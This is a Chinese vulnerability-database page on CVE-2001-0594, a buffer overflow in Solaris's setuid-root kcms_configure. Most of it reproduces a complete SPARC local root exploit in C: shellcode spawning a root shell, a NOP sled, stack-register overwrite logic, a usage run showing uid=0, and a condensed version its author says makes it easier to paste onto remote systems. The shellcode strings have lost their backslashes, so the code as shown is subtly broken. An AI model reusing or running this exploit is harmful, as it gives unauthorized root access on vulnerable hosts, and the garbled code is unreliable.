Solaris kcms_configure获取额外特权漏洞

Solaris kcms_configure获取额外特权漏洞

漏洞ID 1106281 漏洞类型 缓冲区溢出
发布时间 2001-04-09 更新时间 2005-05-02
图片[1]-Solaris kcms_configure获取额外特权漏洞-安全小百科CVE编号 CVE-2001-0594
图片[2]-Solaris kcms_configure获取额外特权漏洞-安全小百科CNNVD-ID CNNVD-200108-012
漏洞平台 Solaris CVSS评分 4.6
|漏洞来源
https://www.exploit-db.com/exploits/20741
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200108-012
|漏洞详情
包含在Solaris7和8版本中的kcms_configure存在漏洞。本地攻击者借助命令行参数中的缓冲区溢出获取额外的特权。
|漏洞EXP
source: http://www.securityfocus.com/bid/2558/info
 
The Kodak Color Management System, or KCMS, is a package that ships with workstation installations of Solaris 7 and 8. kcms_configure, a part of KCMS, is vulnerable to a buffer overflow if it is passed an overly long string on the command-line by a local user. kcms_configure is installed setuid root, so a buffer overflow can lead to arbitrary code execution as root.
 
An exploit for x86 Solaris is available to attackers. 

/* kcms_configure -o -S command line buffer overflow, SPARC/solaris 8
 *
 * http://www.securityfocus.com/bid/2558
 *
 * Coded June 22, 2002 by Adam Slattery. Phear. The vulnerability
 * was discovered a long time ago (04/2001), but there haven't been
 * any published sparc exploits as far as I know (only x86).
 *
 * Adam Slattery <[email protected]>
 *
 * DESCRIPTION:
 *
 * The i386/solaris 8 exploit by eEye (Riley Hassell) was trivial. A
 * sparc version is somewhat more complicated, but not daunting. Because
 * of the location of the overflow in the program, quite a bit of code
 * gets executed before the second return (which is the jump to
 * shellcode in a sparc overflow). Some of this code relies on the
 * registers being set, and we're overwriting the saved registers
 * when we overflow the stack buffer. To remedy this situation we
 * need to overflow the stack very carefully because in the process
 * of overwriting the saved i7 register (return address), we overwrite
 * the l0-07 and i0-i6 [fp] registers. The code that gets executed before
 * the second return makes use of a few of these overwritten registers.
 * So... we overwrite these saved registers with a "good" address that
 * points to a pointer, so pretty much any code using values in the
 * registers won't try to access illegal memory and cause a seg fault.
 * It may sound sketchy, but it works.
 *
 * USAGE:
 *
 * gcc kcms_sparc.c -o kcms_sparc
 * ./kcms_sparc [offset] [ptr addr]
 *
 * $ ./kcms_sparc
 * ret address: 0xffbee4f8 [3036]  ptr address: 0xffbeecf8 buflen: 1085
 * # id
 * uid=0(root) gid=100(users)
 *
 *
 * The default offset (3036) should work. 4800 also works. Read the note
 * by the address calculations to see why (there are 2 buffers). Even
 * though it's a 1024 byte buffer, there aren't too many nops left in
 * the second buffer when everything is set so if you have to search
 * for the offet by hand, use increments of 64.
 * The [ptr addr] is an address in memory that points to a pointer.
 * This is loaded into some of the registers that get used before the
 * program jumps into shell code. If the default (0xffbeecf8) doesn't
 * work you, you probably won't be able to make a guess, so you'll
 * have to whip out gdb. If you don't have r00t (most likely), you'll
 * have to use a copy (non-suid) of kcms_configure and LD_PRELOAD a lib
 * to return 0 for geteuid/getegid (so it wonn't detect it's not uid 0).
 *
 *
 * Thanks: optyx, t12, worms, miah, Sun Microsystems, Kodak...
 *
 * Langrets - thanks for making me cookies after I had surgery, which
 *    was the week before I actually released this. They tasted 31337++.
 *
 *
 * random greetz: xexen, rogers, kanu, cyun, cua0, dap, f3tus, xaiou,
 *		langrets, janebond, applejacks, wisdmckr3, cbo2000
 *
 * stupid people: #legions (esp. digiebola, pr00f, gridmark),
 *		MIT, Stanford, Olin (those bastards all turned me down)
 */

#include <stdio.h>
#include <unistd.h>

/* some .s asm code was used from dopesquad.net */
u_char shellcode[] = /* [email protected] */

//setuid(0)
  "x90x1bxc0x0f" /* xor	%o7,%o7,%o0 */
  "x82x10x20x17" /* mov	23,%g1 */
  "x91xd0x20x08" /* ta	8 */

/* For some messed up reason it doesn't seem to work if i
 * use one or the other syscall, but it does if i use both. I
 * don't feel like playing with shellcode anymore right now, and
 * this works, so I don't care.
 */
//setreuid(0,0)
  "x92x1ax40x09" /* xor	%o1,%o1,%o1 */
  "x82x10x20xca" /* mov	202, %g1 */
  "x91xd0x20x08" /* ta	8 */

//exec(/bin/sh)
  "x21x0bxd8x9a" /* sethi	%hi(0x2f626800), %l0 */
  "xa0x14x21x6e" /* or	%l0, 0x16e, %l0 ! 0x2f62696e */
  "x23x0bxdcxda" /* sethi	%hi(0x2f736800), %l1 */
  "x90x23xa0x10" /* sub	%sp, 16, %o0 */
  "x92x23xa0x08" /* sub	%sp, 8, %o1 */
  "x94x1bx80x0e" /* xor	%sp, %sp, %o2 */
  "xe0x3bxbfxf0" /* std	%l0, [%sp - 16] */
  "xd0x23xbfxf8" /* st	%o0, [%sp - 8] */
  "xc0x23xbfxfc" /* st	%g0, [%sp - 4] */
  "x82x10x20x3b" /* mov	59, %g1 */
  "x91xd0x20x08" /* ta	8 */
;

u_char NOP[4] = "xa6x1cxc0x13"; /* xor %l3, %l3, %l3 */


/* we need 1085 bytes to overwrite saved i7 */
/* the vulnerable buffer is a 1024 bytes long */
#define BIGBUF 1086

/* Offsets to saved registers in relation to the bottom of the buffer: */
#define l0_OFFSET 1025
#define i7_OFFSET 1081


/* figure out where the stack starts so we have a rough guestimation */
u_long get_sp(void)
{
   __asm__("mov %sp, %i0n");
}

int main(int argc, char **argv)
{
   u_char buf[BIGBUF+6];
   int i, offset;
   u_long addr;
   u_long paddr;

   if(argc > 1)
      if(!strcmp(argv[1], "-h") || !strcmp(argv[1], "--help"))
       {
         printf("%s [retaddr offset] [ptraddr]n", argv[0]);
         exit(0);
       }

   /* Calculate the return address to put in i7.
    * 3036 should dump us into the nops just fine.
    * We actually have 2 different windows with about 900 bytes
    * of nops each because the buffer we overflow gets copied into
    * another 1024 byte buffer directly below it on the stack.
    * This actually overwrites the first couple hundred nops,
    * but we still have a bunch, so it's ok.
    */
   addr = get_sp();
   if(argc > 1)
      offset = atoi(argv[1]);
   else
      offset = 3036;
   addr -= offset;

   if(argc > 2)
      paddr = strtoul(argv[2], NULL, 0);
   else
      paddr = 0xffbeecf8; //0xffbee3e8 might work too;

   memset(buf, 255, BIGBUF);

   /* Copy NOPS until ~80 bytes before the end of vulnbuf */
   for(i = 1; i < 940 ; i+=4)
      memcpy(buf+i, NOP, 4);

   /* Copy shellcode */
   memcpy(buf+i, shellcode, strlen(shellcode));

   /* because so much code gets executed before the second return, we
    * have to overwrite the stack with very precise data. Finding the
    * right values takes some time in gdb, but it turns out we just need
    * a value that points to some valid memory that points somewhere else.
    * Additionally, this address + 8 needs to do the same. So we need a 
    * string of pointers to pointers. Luckily, this happens quite
    * frequently by blind luck. It just takes some searching in gdb.
    *
    * We just fill all the registers (except i7) with this address. I
    * started with just i1, i4, and i6(fp), and this worked great
    * testing as a normal user, but the program's execution is slightly
    * different when it runs as root (mkdir doesn't fail :), so it was
    * seg faulting and i couldn't figure out why (debugging suid binaries
    * as a normal user is impossible :). So instead of wrapping all these
    * damn library calls through my LD_PRELOADed geteuid() library, I
    * tried filling all the registers. b00m. It worked.
    */

   /* l0-l7 and i0-i6(fp) */
   for(i=l0_OFFSET ; i < i7_OFFSET ; i+=4)
      memcpy(&buf[i], &paddr, 4);

   /* i7, return address */
   memcpy(&buf[i7_OFFSET], &addr, 4);

   /* Null terminate */
   buf[i7_OFFSET+4] = '';

   printf("ret address: 0x%x [%d]  ptr address: 0x%x  len: %dn", 
		addr, offset, paddr, strlen(buf));
   /* b00m! */
   execl("/usr/X/bin/kcms_configure", "pine", "-o", "-S", 
	"blah", buf, NULL);

   puts("execl failed");
return 0;
}



#ifdef UGLY_COPY_AND_PASTE_VERSION
// Fits in a single terminal screen, makes it easier to copy&paste
// the exploit to a remote system. Maybe I'm being a little bit too
// nice to the kiddies? It even has a nice smiley face :)
// ... BEGIN ...

#include <stdio.h>
#include <sys/types.h>
u_char shellcode[] =
"x90x1bxc0x0fx82x10x20x17x91xd0x20x08x92x1ax40x09"
"x82x10x20xcax91xd0x20x08x21x0bxd8x9axa0x14x21x6e"
"x23x0bxdcxdax90x23xa0x10x92x23xa0x08x94x1bx80x0e"
"xe0x3bxbfxf0xd0x23xbfxf8xc0x23xbfxfcx82x10x20x3b"
"x91xd0x20x08"; u_char NOP[4]="xa6x1cxc0x13"; u_long
get_sp(void){__asm__("mov %sp, %i0n");}int main(int ac,char **av)
{ u_char    buf[1092];int i,    offset; u_long addr; u_long pa;
if(ac>1)    if(!strcmp(av[1],   "-h")||!strcmp(av[1],"--help")) {
printf("%s  [retaddr offset]    [ptraddr]n", av[0]); exit(0); }
addr=get_sp(); if(   ac>1) offset=atoi(av[1]); else offset=3036;
addr-=offset;if(ac   >2)pa=strtoul(av[2],NULL,0);else pa=0xffbeecf8;
memset(buf    ,255,1086);for   (i=1;i<940;i+=4) memcpy(buf+i,NOP,4);
memcpy(buf+    i,shellcode    ,strlen(shellcode)); for(i=1025;i<1081;
i+=4) memcpy(               &buf[i], &pa, 4); memcpy(&buf[1081],
&addr,4);buf[1085]='';printf("ret: 0x%x [%d] ptr: 0x%x len: %dn",
addr,offset,pa,strlen(buf)); execl("/usr/X/bin/kcms_configure",
"pine","-o","-S","blah",buf,NULL); puts("exec failed"); return 0; }
// ... END ...
#endif
|参考资料

来源:XF
名称:solaris-kcms-command-bo(6359)
链接:http://xforce.iss.net/static/6359.php
来源:BUGTRAQ
名称:20010409Solariskcms_configurevulnerability
链接:http://archives.neohapsis.com/archives/bugtraq/2001-04/0140.html
来源:BID
名称:2558
链接:http://www.securityfocus.com/bid/2558
来源:USGovernmentResource:oval:org.mitre.oval:def:7
名称:oval:org.mitre.oval:def:7
链接:http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:7
来源:USGovernmentResource:oval:org.mitre.oval:def:65
名称:oval:org.mitre.oval:def:65
链接:http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:65

相关推荐: WoltLab Burning Board Lite ADDENTRY.PHP SQL Injection Vulnerability

WoltLab Burning Board Lite ADDENTRY.PHP SQL Injection Vulnerability 漏洞ID 1097313 漏洞类型 Input Validation Error 发布时间 2005-01-10 更新时间 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享